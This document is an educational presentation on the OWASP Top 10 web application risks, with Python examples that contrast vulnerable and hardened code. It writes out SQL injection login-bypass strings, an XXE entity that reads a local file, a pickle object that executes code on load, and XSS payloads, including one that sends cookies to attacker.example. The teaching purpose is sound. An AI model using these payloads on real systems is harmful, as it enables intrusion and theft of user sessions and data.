OWASP Top 10 Vulnerabilities List
1. OWASP Top 10 Vulnerabilities List
TECHNOLOGY INNOVATION PROCESS
By YITSOL
2. With the online world gaining more importance with every passing day,
website security needs to be one of the leading priorities for site owners
everywhere. That said, some vulnerabilities and issues are more important
than others, and it is necessary to prioritise those over the rest.
Now, that is where the OWASP (Open Web Application Security Project)
Top 10 list of security risks comes in: it ranks the most critical
categories of web application risk, so that you know what to look out for
in order to secure your website and keep it free from threats and
vulnerabilities.
Let's look at the ten risks here:
3. #1 Injection flaws:
Injection takes place when untrusted data is sent to an interpreter as part
of a query or command, so that the interpreter executes attacker-supplied
text as if it were part of the query. SQL injection is the most common
form, but the same flaw occurs with OS command, LDAP, NoSQL and other
interpreters.
The entry point is usually user-supplied data that is concatenated into the
query without sanitisation or parameterisation. That is what makes this
vulnerability so dangerous, and one that website owners should prioritise.
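The following is an added example (not code from the original presentation) showing the SQL injection described above against a constructed in-memory SQLite table: a login check built by string concatenation, the same check as a parameterised query, and two classic attacker inputs. The table, the user record and the payload strings are all constructed for the demonstration; passwords are stored in plain text only so the injected clause is easy to read.

```python
import sqlite3


def build_db():
    """Constructed in-memory user table so the example runs offline.
    (Plaintext passwords only to keep the injection visible; never store them.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Untrusted input is pasted into the SQL text, so the database engine
    # cannot tell where the data ends and the query begins.
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    # Parameterised query: the values travel separately from the statement,
    # so a quote in the input is just a character to compare against.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


# Constructed attacker inputs.
TAUTOLOGY = "' OR '1'='1"   # makes the WHERE clause always true
COMMENT_OUT = "alice' --"   # closes the string and comments out the password check


def demo():
    conn = build_db()
    return {
        "vulnerable_tautology": login_vulnerable(conn, TAUTOLOGY, TAUTOLOGY),
        "vulnerable_comment": login_vulnerable(conn, COMMENT_OUT, "wrong"),
        "safe_tautology": login_safe(conn, TAUTOLOGY, TAUTOLOGY),
        "safe_comment": login_safe(conn, COMMENT_OUT, "wrong"),
        "safe_real_login": login_safe(conn, "alice", "correct-horse"),
    }
```

With the vulnerable function the tautology payload rewrites the clause as `username = '' OR '1'='1' AND password = '' OR '1'='1'`, and the comment payload reduces it to `username = 'alice'`; both return true without a valid password. The parameterised version treats the same strings as literal usernames and rejects them.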
4. #2 Authentication problems:
This occurs when authentication and session management functions are
incorrectly implemented: weak or default passwords are accepted,
credential stuffing and brute force are not rate-limited, session tokens
are predictable, exposed in URLs or never expire, or sessions are not
rotated after login.
The result is that attackers can compromise credentials (passwords, session
tokens, keys and usernames) and assume the identity of other users,
including administrative accounts, for their own benefit.
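As an added example (not code from the original presentation), the sketch below shows the two pieces of session and credential handling the slide is about: salted, iterated password hashing with a constant-time comparison, and server-side sessions keyed by a CSPRNG token that expire and are rotated after a privilege change. The storage format, the iteration count and the timeout are assumptions chosen for the demonstration, not values from the page.

```python
import hashlib
import hmac
import os
import secrets
import time

# Assumed parameters for the demo: PBKDF2-HMAC-SHA256, 16-byte random salt.
# Tune the iteration count to your hardware so one hash costs tens of ms.
PBKDF2_ITERATIONS = 200_000
SESSION_TTL_SECONDS = 900


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    # Constant-time comparison so timing does not leak how many bytes matched.
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


class SessionStore:
    """Server-side sessions keyed by an unguessable random token."""

    def __init__(self, ttl_seconds=SESSION_TTL_SECONDS):
        self.ttl = ttl_seconds
        self._sessions = {}  # token -> (username, expiry as unix time)

    def create(self, username, now=None):
        now = time.time() if now is None else now
        # 256 bits from the OS CSPRNG: never a counter, a timestamp or a
        # hash of the user id, all of which an attacker can predict.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (username, now + self.ttl)
        return token

    def lookup(self, token, now=None):
        now = time.time() if now is None else now
        entry = self._sessions.get(token)
        if entry is None:
            return None
        username, expiry = entry
        if now >= expiry:
            del self._sessions[token]  # expired: treat as unauthenticated
            return None
        return username

    def rotate(self, token, now=None):
        """Issue a fresh token after login or a privilege change, so a token
        an attacker planted or captured earlier stops being valid."""
        username = self.lookup(token, now)
        if username is None:
            return None
        del self._sessions[token]
        return self.create(username, now)
```

The `now` parameters exist only so the timeout logic can be exercised deterministically; in a real application they default to the clock.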
5. #3 Sensitive data exposure:
This risk arises when an application fails to protect the sensitive data it
holds: storing or transmitting it in clear text, using weak or outdated
cryptography, or leaving it in logs, backups and error pages. It makes
users' personal information, such as addresses, payment details and
credentials, easily available to attackers.
While this is bad for the customers, it is also a huge worry for
businesses and websites, as they are likely to lose users and customers
after breaches of this nature.
6. #4 XML external entities:
Simply put, this vulnerability is an injection-type attack that is carried
out through Extensible Markup Language (XML) input. An XML document can
declare an external entity that points at a local file or a URL; an XML
parser that resolves such entities will read the file or fetch the URL and
embed the result, letting the attacker read server files, reach internal
services or exhaust the server. The fix is to disable DTD processing and
external entity resolution in the parser, or, wherever possible, to use a
less complex data format such as JSON.
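The following added example (not code from the original presentation) demonstrates the attack and the fix with Python's standard `xml.sax` parser. It writes a constructed "secret" file, builds an XML document whose DTD declares an external entity pointing at that file, and parses it twice: once with the parser's `feature_external_ges` feature switched on, which is how a resolving parser behaves, and once with it off, which has been the default since Python 3.7.1. The file contents and element names are constructed for the demo.

```python
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data the parser delivers."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def write_secret_file(content=b"db_password=s3cr3t-value"):
    # Constructed stand-in for a sensitive local file such as /etc/passwd.
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return path


def xxe_payload(secret_path):
    # The DTD declares an external entity backed by a local file; the body
    # references it, so a resolving parser reads the file into the document.
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE order [<!ENTITY secret SYSTEM "%s">]>\n'
        "<order><note>&secret;</note></order>"
    ) % Path(secret_path).as_uri()


def parse_with_sax(xml_bytes, resolve_external_entities):
    """Parse with xml.sax, setting feature_external_ges explicitly."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    # Python 3.7.1+ defaults this to False; many other XML libraries resolve
    # external entities out of the box, so always set it deliberately.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def reject_doctype(xml_bytes):
    """Defence in depth: refuse any document that carries a DTD at all."""
    if b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes:
        raise ValueError("DTD and entity declarations are not accepted")
    return xml_bytes


def demo():
    """Return (text with resolution on, text with resolution off)."""
    secret_path = write_secret_file()
    try:
        payload = xxe_payload(secret_path).encode("utf-8")
        leaked = parse_with_sax(payload, resolve_external_entities=True)
        safe = parse_with_sax(payload, resolve_external_entities=False)
        return leaked, safe
    finally:
        os.unlink(secret_path)
```

With resolution on, the file contents appear as the text of `<note>`; with it off, the entity reference expands to nothing. `reject_doctype` is the cheaper guard to put in front of any parser whose entity settings you cannot vouch for.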
7. #5 Broken access control:
Access controls are the checks that decide what an authenticated user is
permitted to see and do. When they are broken, a user who does not have
the necessary permissions is allowed to reach other users' records or
administrative functions, often simply by changing an identifier in a URL
or request, and this can have disastrous consequences for the website and
the business.
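As an added example (not code from the original presentation), the following shows the identifier-tampering case described above against a constructed invoice store: a lookup that only checks that the caller is logged in, and the same lookup with an ownership check that denies by default. The user model, the roles and the records are assumptions made for the demonstration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str  # assumed roles for the demo: "customer" or "admin"


class Forbidden(Exception):
    pass


# Constructed data store: invoice id -> record with its owner.
INVOICES = {
    101: {"owner": "alice", "amount": 40},
    102: {"owner": "bob", "amount": 75},
}


def get_invoice_vulnerable(user, invoice_id):
    # The caller is authenticated, but nothing ties the record to the
    # caller: bob can request invoice 101 and read alice's data (an
    # insecure direct object reference).
    return INVOICES[invoice_id]


def get_invoice_safe(user, invoice_id):
    record = INVOICES.get(invoice_id)
    # Deny by default. Unknown ids and other users' ids produce the same
    # refusal, so the endpoint does not confirm which ids exist.
    if record is None:
        raise Forbidden(invoice_id)
    if record["owner"] != user.name and user.role != "admin":
        raise Forbidden(invoice_id)
    return record


def list_invoices_safe(user):
    # Scope the query by the authenticated identity on the server side
    # instead of trusting a client-supplied owner filter.
    return {
        invoice_id: record
        for invoice_id, record in INVOICES.items()
        if user.role == "admin" or record["owner"] == user.name
    }


def can_read(user, invoice_id):
    """True if the hardened lookup permits the read."""
    try:
        get_invoice_safe(user, invoice_id)
    except Forbidden:
        return False
    return True
```

The enforcement lives next to the data access rather than in the UI: hiding a link is not an access control, since the attacker sends the request directly.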
8. #6 Security misconfiguration:
Security misconfiguration rarely comes from the application code itself.
It usually arises from insecure default settings, incomplete or ad hoc
configuration, unnecessary features and accounts left enabled, default
credentials, open cloud storage, or verbose error messages that reveal
internal details. The consequences are much the same as those of broken
permissions, so this issue should be addressed as soon as possible to
ensure the continued smooth and risk-free operation of the website.
9. #7 Cross-site scripting (XSS):
This issue occurs when untrusted data is placed into a web page without
proper validation or escaping, so that an attacker's script runs in the
victim's browser in the context of the site. From there the attacker can
steal session tokens, deface the page or redirect the user to a malicious
site.
This threat must be kept at bay, as it is one of the basic and vital
issues as far as user trust and relationships are concerned.
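The following added example (not code from the original presentation) renders a constructed user comment into HTML three ways: unescaped, escaped for the HTML body, and escaped for an attribute and a link, since each context needs its own treatment. The attacker strings and the HTML fragments are constructed for the demonstration.

```python
import html
from urllib.parse import urlsplit


def render_comment_vulnerable(comment):
    # Untrusted text dropped straight into the HTML body.
    return '<p class="comment">%s</p>' % comment


def render_comment_safe(comment):
    # HTML-body context: < > & " ' become entities, so a tag in the input
    # is shown as text instead of being parsed as markup.
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


def render_input_safe(value):
    # Attribute context: quote=True is essential here, otherwise a " in the
    # input closes the attribute and the rest becomes new attributes.
    return '<input type="text" name="q" value="%s">' % html.escape(value, quote=True)


def render_link_safe(url, label):
    # URL context: entity-encoding does nothing against javascript: URLs,
    # so allow-list the scheme before emitting the href. (Relative URLs are
    # also refused here; relax that if your application needs them.)
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return '<a href="%s">%s</a>' % (
        html.escape(url, quote=True),
        html.escape(label, quote=True),
    )


# Constructed attacker inputs, one per context.
BODY_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'
URL_PAYLOAD = "javascript:alert(document.cookie)"
```

Output encoding of this kind is the baseline; a Content Security Policy and `HttpOnly` session cookies limit what an injected script can still do if an encoding is missed somewhere.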
10. #8 Insecure deserialization:
This flaw occurs when untrusted data is deserialized by the application.
Serialized objects turn up in many places, including API authentication
tokens, caches, database fields and session cookies, and a deserializer
that rebuilds arbitrary objects from attacker-controlled bytes can be made
to execute code. Even where remote code execution is not possible,
deserialization attacks can result in privilege escalation, injection and
replay attacks.
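As an added example (not code from the original presentation), the following demonstrates the code-execution case with Python's `pickle`: an attacker-built object whose `__reduce__` tells the unpickler to call `eval`, a loader that trusts the bytes, a restricted unpickler that only resolves an allow-listed class, and a data-only JSON alternative. The `Session` class, the allow-list and the evaluated expression are constructed for the demonstration.

```python
import io
import json
import os
import pickle
from dataclasses import asdict, dataclass


@dataclass
class Session:
    user: str
    role: str


class Exploit:
    """Constructed attacker object. pickle asks __reduce__ how to rebuild an
    instance; the answer 'call eval on this string' means loading the bytes
    runs the code. The expression here is harmless (it imports os and
    returns the working directory); any other expression would do."""

    def __reduce__(self):
        return (eval, ("__import__('os').getcwd()",))


def build_malicious_payload():
    return pickle.dumps(Exploit())


def dump_session(session):
    return pickle.dumps(session)


def load_vulnerable(blob):
    # pickle.loads on attacker-controlled bytes: arbitrary code execution.
    return pickle.loads(blob)


# Allow-list of the only global the unpickler may resolve.
ALLOWED_GLOBALS = {(Session.__module__, "Session")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def load_restricted(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def restricted_load_rejects(blob):
    """True when the restricted loader refuses the payload."""
    try:
        load_restricted(blob)
    except pickle.UnpicklingError:
        return True
    return False


def session_to_json(session):
    return json.dumps(asdict(session))


def session_from_json(text):
    # A data-only format: JSON yields dicts, lists and scalars, never an
    # arbitrary object, so the receiving code decides what gets built.
    data = json.loads(text)
    return Session(user=str(data["user"]), role=str(data["role"]))


def demo():
    """(vulnerable loader ran the attacker's code, restricted loader refused it)"""
    payload = build_malicious_payload()
    return load_vulnerable(payload) == os.getcwd(), restricted_load_rejects(payload)
```

The restricted unpickler is a last resort for legacy data: it narrows the attack surface but still exposes the full pickle machinery to the input. For anything that crosses a trust boundary, a data-only format plus explicit construction, as in `session_from_json`, is the right design.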
11. #9 The use of components with known vulnerabilities:
Libraries, frameworks and other software modules run with the same
privileges as the application that uses them.
When a known vulnerability in such a component is exploited, the result
can be a significant loss of data or even a server takeover. Website
owners should therefore keep an inventory of the components they use,
apply security updates promptly, and avoid components with known
vulnerabilities.
12. #10 Insufficient logging and monitoring:
While this is not a direct vulnerability, a lack of logging and monitoring
lets an attacker who exploits any of the nine risks above probe, persist
and pivot within your systems without being noticed.
What's more, if the business or website manager does not carry out the
necessary logging and monitoring, you may not even be aware that your site
is under attack, and this can lead to a whole host of problems.
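As an added example (not code from the original presentation), the following runs two simple detections over a constructed authentication log: a sliding-window count of failed logins per source IP, and a second rule that fires when an IP already flagged for brute force subsequently logs in successfully, which is the point at which an incident has probably become an account compromise. The log format, the addresses and the thresholds are constructed for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample authentication log (not real traffic). One attacker
# address hammers alice's account and eventually succeeds; bob mistypes once.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z ip=203.0.113.7 user=alice event=login_failed
2024-05-01T10:00:03Z ip=198.51.100.9 user=bob event=login_failed
2024-05-01T10:00:05Z ip=203.0.113.7 user=alice event=login_failed
2024-05-01T10:00:09Z ip=203.0.113.7 user=alice event=login_failed
2024-05-01T10:00:12Z ip=198.51.100.9 user=bob event=login_success
2024-05-01T10:00:14Z ip=203.0.113.7 user=alice event=login_failed
2024-05-01T10:00:20Z ip=203.0.113.7 user=alice event=login_failed
2024-05-01T10:00:31Z ip=203.0.113.7 user=alice event=login_success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) event=(?P<event>\S+)$"
)


def parse_log(text):
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # in production, count these: a parser gap is a blind spot
        event = match.groupdict()
        event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(event)
    return events


def detect(events, threshold=5, window=timedelta(minutes=1)):
    """Return alert tuples (rule, ip, timestamp) in log order."""
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for event in events:
        recent = failures[event["ip"]]
        if event["event"] == "login_failed":
            recent.append(event["ts"])
            # Drop failures that fell out of the sliding window.
            while recent and event["ts"] - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold and event["ip"] not in flagged:
                flagged.add(event["ip"])  # alert once per address, not per line
                alerts.append(("brute_force", event["ip"], event["ts"]))
        elif event["event"] == "login_success" and event["ip"] in flagged:
            alerts.append(("success_after_brute_force", event["ip"], event["ts"]))
    return alerts


def run_detection():
    return detect(parse_log(SAMPLE_LOG))
```

The second rule is the one worth paging on: a burst of failures is noise until it is followed by a success, at which point the session it created should be terminated and the account's owner contacted. None of this is possible unless login failures, with source address and account, are logged in the first place.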
13. Conclusion:
We hope you found this presentation on the OWASP Top 10 vulnerabilities
list useful, and we encourage you to pay attention to these
vulnerabilities and ensure that your website always remains safe, secure
and free of risk.